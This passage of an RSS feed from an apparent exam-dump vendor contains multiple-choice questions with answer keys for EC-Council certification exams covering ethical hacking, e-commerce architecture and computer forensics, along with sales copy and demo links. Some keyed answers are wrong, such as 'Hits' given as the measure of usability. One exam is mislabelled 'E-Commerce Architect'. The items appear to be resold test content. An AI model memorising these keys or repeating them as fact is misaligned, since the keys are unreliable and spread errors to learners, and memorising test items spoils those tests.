A. Traviss computer is infected with stealth kernel level rootkit<br />
B. Traviss computer is infected with Stealth Trojan Virus<br />
C. Traviss computer is infected with Self-Replication Worm that fills the hard disk space<br />
D. Logic Bomb is triggered at random times creating hidden data consuming junk files<br />
Answer: A</p>
<p>12.  You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permissions. You need to know what your privileges are within the shell. What are your current privileges?<br />
A. LocalSystem<br />
B. Administrator<br />
C. IUSR_COMPUTERNAME<br />
D. IIS default installation account<br />
Answer: A</p>
<p>13.  What hacking attack is challenge/response authentication used to prevent?<br />
A. Replay attacks<br />
B. Scanning attacks<br />
C. Session hijacking attacks<br />
D. Password cracking attacks<br />
Answer: A</p>
<p>14.  Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive be able to get from the client before commencing his test?<br />
A. Only the IP address range<br />
B. Nothing but corporate name<br />
C. All that is available from the client<br />
D. IP Range, OS, and patches installed<br />
Answer: B</p>
<p>15.  System administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup of a target network. How would you search for these posting using Google search?<br />
A. Search in Google using the key search strings &quot;the target company&quot; and &quot;newsgroups&quot;<br />
B. Search for the target company name at http://groups.google.com<br />
C. Use NNTP websites to search for these postings<br />
D. Search in Google using the key search strings &quot;the target company&quot; and &quot;forums&quot;<br />
Answer: B</p>
</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.ibm-certification-exam.com/EC0-350/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>New EC0-232 exam on Certinside</title>
		<link>http://www.ibm-certification-exam.com/EC0-232/</link>
		<comments>http://www.ibm-certification-exam.com/EC0-232/#comments</comments>
		<pubDate>Mon, 03 Aug 2009 11:15:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[EC-COUNCIL]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[
				   EC0-232 Exam Description
					Questions and Answers:500 Q&#038;As  
					Updated:  2009-09-18 
					Exam Number/Code: EC0-232
					Exam Name: e-commerce architect

					Certinside professional IT Q&#038;A vendors, we provide well after-sale service. To all the customers buy the Q&#038;As, we provide track service. when you buy the Q&#038;As with in 3 months. you can enjoy the upgrade Q&#038;As service [...]]]></description>
			<content:encoded><![CDATA[<div  class="left">
				   <strong>EC0-232 Exam Description</span></strong><br />
					Questions and Answers:<strong>500</strong> Q&#038;As <br /> <br />
					Updated:  <strong>2009-09-18</strong> <br />
					Exam Number/Code: <strong>EC0-232</strong><br />
					Exam Name: <strong>e-commerce architect</strong></p>
<p><span id="more-989"></span></p>
<p>					<a href="http://www.certinside.com/" target="_blank"><strong>Certinside</strong></a> professional IT Q&#038;A vendors, we provide well after-sale service. To all the customers buy the Q&#038;As, we provide track service. when you buy the Q&#038;As with in 3 months. you can enjoy the upgrade Q&#038;As service for free. If in this period, the certified test center change the <a href="http://www.certinside.com/EC-COUNCIL.html" target="_blank"><strong>EC-COUNCIL</strong></A> <a href="http://www.certinside.com/E-Commerce-Architect.html" target="_blank"><strong>E-Commerce Architect</strong></a> <a href="http://www.certinside.com/EC0-232.html" target="_blank">EC0-232</a> Q&#038;As, we will update the Q&#038;A in the first time, and provide you the download update for free</div>
<div class="exam_info">
<p>				<strong>EC0-232 Free Demo Download</strong><br />
					<P><a href="http://www.certinside.com/" target="_blank"><strong>Certinside</strong></a> offers free demo for <a href="http://www.certinside.com/EC0-232.html" target="_blank">EC0-232</a> 500 Q &#038; As with Expert Explanations). You can check out the interface, question quality and usability of our practice exams before you decide to buy it. <BR><BR><br />
					<a href="http://pdfdemo.certinside.com/EC0-232.pdf" style="font-size:14px;color:#f30" target="_blank">Download EC0-232 Exam Pdf Demo</a><BR><br />
					<a href="http://iengine.certinside.com/EC0-232.zip" style="font-size:14px;color:#f30" target="_blank">Download EC0-232 Exam iEngine Demo</a><br />
									  </P></p>
<p>
				　<br />
　<br />
Exam	  :  EC-Council EC0-232<br />
Title    :  E-Commerce Architect</p>
<p>
1.  An employee is using the company&#8217;s computers to do personal work. What type of ethical issue is involved?<br />
A. Privacy<br />
B. Accuracy<br />
C. Property<br />
D. Accessibility<br />
Answer: C</p>
<p>2.  Which of the following is an example of edutainment?<br />
A. Combining a popular video game with geographic information.<br />
B. Combining a popular movie with a video game.<br />
C. Basing a learning game on the theme of a popular movie.<br />
D. Basing a learning game on the theme of a popular video game.<br />
Answer: A</p>
<p>3.  Company Abacusboss.com sells a variety of products on its Web site to the highest bidder. What type of business model are they using?<br />
A. Affiliate Marketing<br />
B. Online Auction<br />
C. Supply Chain improver<br />
D. Name your price<br />
Answer: B</p>
<p>4.  Which of the following is not an electronic activity in government?<br />
A. Government-to-school transactions<br />
B. Government-to-government transactions<br />
C. Government-to-business transactions<br />
D. Government-to-citizen transactions<br />
Answer: A</p>
<p>5.  You&#8217;re designing an E-Commerce Web site that sells to consumers. You need a unique identifier to assign to each visitor, so their activities can be tracked. Based on the above scenario, which one of the following choices is a secure and reliable way doing this?<br />
A. Keep their IP Address in the Web Server&#8217;s memory.<br />
B. Put their email address in a cookie.<br />
C. Store their IP Address in a Database.<br />
D. Give them a cookie with a Unique ID, then store it in a database.<br />
Answer: D</p>
<p>6.  Ethics is:<br />
A. Justice, equity, honesty, trustworthiness, and fairness.<br />
B. A subjective feeling of being innately right.<br />
C. An important issue in e-commerce.<br />
D. Being self centered.<br />
Answer: A</p>
<p>7.  Among the usages and advantages of the Internet for business use are:<br />
A. Marketing and selling products and services.<br />
B. Promoting a paper-free environment.<br />
C. Efficiency and unequaled cost-effectiveness.<br />
D. All of the above.<br />
Answer: D</p>
<p>8.  Measuring your customer&#8217;s ease of learning and interacting with your site is a measure of:<br />
A. Pageviews<br />
B. Latency<br />
C. Hits<br />
D. Usability<br />
Answer: C</p>
<p>9.  Which of the following methods would not be as effective (defined as users/dollar) for a vertical B2B site?<br />
A. Television advertisements<br />
B. Individual contact<br />
C. Trade journals<br />
D. Affiliation services<br />
Answer: A</p>
<p>10.  What does the term &quot;banner blindness&quot; refer to?<br />
A. The growing trend of adding interactivity to banner advertisements to increase their visibility.<br />
B. The anonymous tracking of banner impressions and browsing behaviors across multiple sites.<br />
C. The refusal of companies to acknowledge banner advertising as a valuable advertising medium.<br />
D. The growing trend of visitors completely ignoring banner advertisements.<br />
Answer: D</p>
<p>11.  What is a benefit of Frequently Asked Questions (FAQ)?<br />
A. Allows the customer to quickly find answers to questions.<br />
B. The answers can change dynamically based on the questions.<br />
C. The merchant is able to avoid questions by answering common ones up front.<br />
D. The merchant is able to answer questions at a lower cost.<br />
Answer: A</p>
<p>12.  Which of the following is the most serious strategic threat to traditional travel agents?<br />
A. Low prices<br />
B. Intelligent software agents<br />
C. Automated Services<br />
D. 24 hour service<br />
Answer: A</p>
<p>13.  What are the four steps of developing and managing an e-infrastructure?<br />
A. 1. Electronic Commerce strategy formulation<br />
2. Application design<br />
3. Building or buying the application<br />
4. Hosting/operating and maintaining the Electronic Commerce.<br />
B. 1. Electronic Commerce strategy formulation<br />
2. Building or buying the application<br />
3. Hosting/operating and maintaining the Electronic Commerce.<br />
C. 1. Electronic Commerce strategy formulation<br />
2. Building or buying the application<br />
3. Hosting the Electronic Commerce.<br />
D. 1. Electronic Commerce strategy formulation<br />
2. Application design<br />
3. Building or buying the application<br />
4. Hosting the Electronic Commerce.<br />
Answer: A</p>
<p>14.  Brett&#8217;s company is beginning an Electronic Commerce effort because his competitors are beginning to be successful at it. Which approach is Brett using to make his decision?<br />
A. Problem-driven<br />
B. Technology-driven<br />
C. Market-driven<br />
D. Fear-driven<br />
Answer: C</p>
<p>15.  Which of the following is a tangible benefit of SCM software integration?<br />
A. IT cost reduction<br />
B. Information visibility<br />
C. Standardization<br />
D. Customer responsiveness<br />
Answer: A</p>
</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.ibm-certification-exam.com/EC0-232/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New EC0-349 exam on Certinside</title>
		<link>http://www.ibm-certification-exam.com/EC0-349/</link>
		<comments>http://www.ibm-certification-exam.com/EC0-349/#comments</comments>
		<pubDate>Mon, 03 Aug 2009 11:07:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[EC-COUNCIL]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[
				   EC0-349 Exam Description
					Questions and Answers:186 Q&#038;As  
					Updated:  2009-09-29 
					Exam Number/Code: EC0-349
					Exam Name: Computer Hacking Forensic Investigator

					Certinside professional IT Q&#038;A vendors, we provide well after-sale service. To all the customers buy the Q&#038;As, we provide track service. when you buy the Q&#038;As with in 3 months. you can enjoy the upgrade [...]]]></description>
			<content:encoded><![CDATA[<div  class="left">
				   <strong>EC0-349 Exam Description</span></strong><br />
					Questions and Answers:<strong>186</strong> Q&#038;As <br /> <br />
					Updated:  <strong>2009-09-29</strong> <br />
					Exam Number/Code: <strong>EC0-349</strong><br />
					Exam Name: <strong>Computer Hacking Forensic Investigator</strong></p>
<p><span id="more-279"></span></p>
<p>					<a href="http://www.certinside.com/" target="_blank"><strong>Certinside</strong></a> professional IT Q&#038;A vendors, we provide well after-sale service. To all the customers buy the Q&#038;As, we provide track service. when you buy the Q&#038;As with in 3 months. you can enjoy the upgrade Q&#038;As service for free. If in this period, the certified test center change the <a href="http://www.certinside.com/EC-COUNCIL.html" target="_blank"><strong>EC-COUNCIL</strong></A> <a href="http://www.certinside.com/Certified-Ethical-Hacker.html" target="_blank"><strong>Certified Ethical Hacker</strong></a> <a href="http://www.certinside.com/EC0-349.html" target="_blank">EC0-349</a> Q&#038;As, we will update the Q&#038;A in the first time, and provide you the download update for free</div>
<div class="exam_info">
<p>				<strong>EC0-349 Free Demo Download</strong><br />
					<P><a href="http://www.certinside.com/" target="_blank"><strong>Certinside</strong></a> offers free demo for <a href="http://www.certinside.com/EC0-349.html" target="_blank">EC0-349</a> 186 Q &#038; As with Expert Explanations). You can check out the interface, question quality and usability of our practice exams before you decide to buy it. <BR><BR><br />
					<a href="http://pdfdemo.certinside.com/EC0-349.pdf" style="font-size:14px;color:#f30" target="_blank">Download EC0-349 Exam Pdf Demo</a><BR><br />
					<a href="http://iengine.certinside.com/EC0-349.zip" style="font-size:14px;color:#f30" target="_blank">Download EC0-349 Exam iEngine Demo</a><br />
									  </P></p>
<p>
				　<br />
　<br />
Exam	  :  EC-Council EC0-349<br />
Title    :  E-Commerce Architect</p>
<p>
1.  A forensics investigator needs to copy data from a computer to some type of removable media so he can examine the information at another location. The<br />
problem is that the data is around 42GB in size. What type of removable media could the investigator use?<br />
A.Blu-Ray single-layer<br />
B.HD-DVD<br />
C.Blu-Ray dual-layer<br />
D.DVD-18<br />
Answer: C</p>
<p>2.  What is the last bit of each pixel byte in an image called?<br />
A.Last significant bit<br />
B.Least significant bit<br />
C.Least important bit<br />
D.Null bit<br />
Answer: B</p>
<p>3.  What information do you need to recover when searching a victims computer for a crime committed with specific e-mail message?<br />
A.Internet service provider information<br />
B.E-mail header<br />
C.Username and password<br />
D.Firewall log<br />
Answer: B</p>
<p>4.  Madison is on trial for allegedly breaking into her universitys internal network. The police raided her dorm room and seized all of her computer<br />
equipment. Madisons lawyer is trying to convince the judge that the seizure was unfounded and baseless. Under which US Amendment is Madisons lawyer trying to<br />
prove the police violated?<br />
A.The 10th Amendment<br />
B.The 5th Amendment<br />
C.The 1st Amendment<br />
D.The 4th Amendment<br />
Answer: D</p>
<p>5.  Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?<br />
A.Search warrant<br />
B.Subpoena<br />
C.Wire tap<br />
D.Bench warrant<br />
Answer: A</p>
<p>6.  In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider<br />
(ISP). You contact the ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide?<br />
A.The ISP can investigate anyone using their service and can provide you with assistance<br />
B.The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you<br />
without a warrant<br />
C.The ISP cannot conduct any type of investigations on anyone and therefore cannot assist you<br />
D.ISPs never maintain log files so they would be of no use to your investigation<br />
Answer: B</p>
<p>7.  What hashing method is used to password protect Blackberry devices?<br />
A.AES<br />
B.RC5<br />
C.MD5<br />
D.SHA-1<br />
Answer: D</p>
<p>8.  In the following Linux command, what is the outfile?<br />
dd if=/usr/bin/personal/file.txt of=/var/bin/files/file.txt<br />
A./usr/bin/personal/file.txt<br />
B./var/bin/files/file.txt<br />
C./bin/files/file.txt<br />
D.There is not outfile specified<br />
Answer: B</p>
<p>9.  The efforts to obtain information before a trial by demanding documents, depositions, questions and Answers written under oath, written requests for<br />
admissions of fact, and examination of the scene is a description of what legal term?<br />
A.Detection<br />
B.Hearsay<br />
C.Spoliation<br />
D.Discovery<br />
Answer: D</p>
<p>10.  Sectors in hard disks typically contain how many bytes?<br />
A.256<br />
B.512<br />
C.1024<br />
D.2048<br />
Answer: B</p>
<p>11.  You are working as an independent computer forensics investigator and receive a call from a systems administrator for a local school system requesting<br />
your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer Lab.<br />
When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a simple backup copy of the hard drive in the PC<br />
and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a simple backup copy will not<br />
provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future<br />
proceedings?<br />
A.Bit-stream copy<br />
B.Robust copy<br />
C.Full backup copy<br />
D.Incremental backup copy<br />
Answer: A</p>
<p>12.  Which forensic investigating concept trails the whole incident from how the attack began to how the victim was affected?<br />
A.Point-to-point<br />
B.End-to-end<br />
C.Thorough<br />
D.Complete event analysis<br />
Answer: B</p>
<p>13.  A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator<br />
wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache.<br />
Moreover, he has removed any images he might have downloaded. What can the investigator do to prove the violation? Choose the most feasible option.<br />
A.Image the disk and try to recover deleted files<br />
B.Seek the help of co-workers who are eye-witnesses<br />
C.Check the Windows registry for connection data (You may or may not recover)<br />
D.Approach the websites for evidence<br />
Answer: A</p>
<p>14.  What will the following Linux command accomplish?<br />
dd if=/dev/mem of=/home/sam/mem.bin bs=1024<br />
A.Copy the master boot record to a file<br />
B.Copy the contents of the system folder mem to a file<br />
C.Copy the running memory to a file<br />
D.Copy the memory dump file to an image file<br />
Answer: C</p>
<p>15.  When a router receives an update for its routing table, what is the metric value change to that path?<br />
A.Increased by 2<br />
B.Decreased by 1<br />
C.Increased by 1<br />
D.Decreased by 2<br />
Answer: C</p>
</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.ibm-certification-exam.com/EC0-349/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
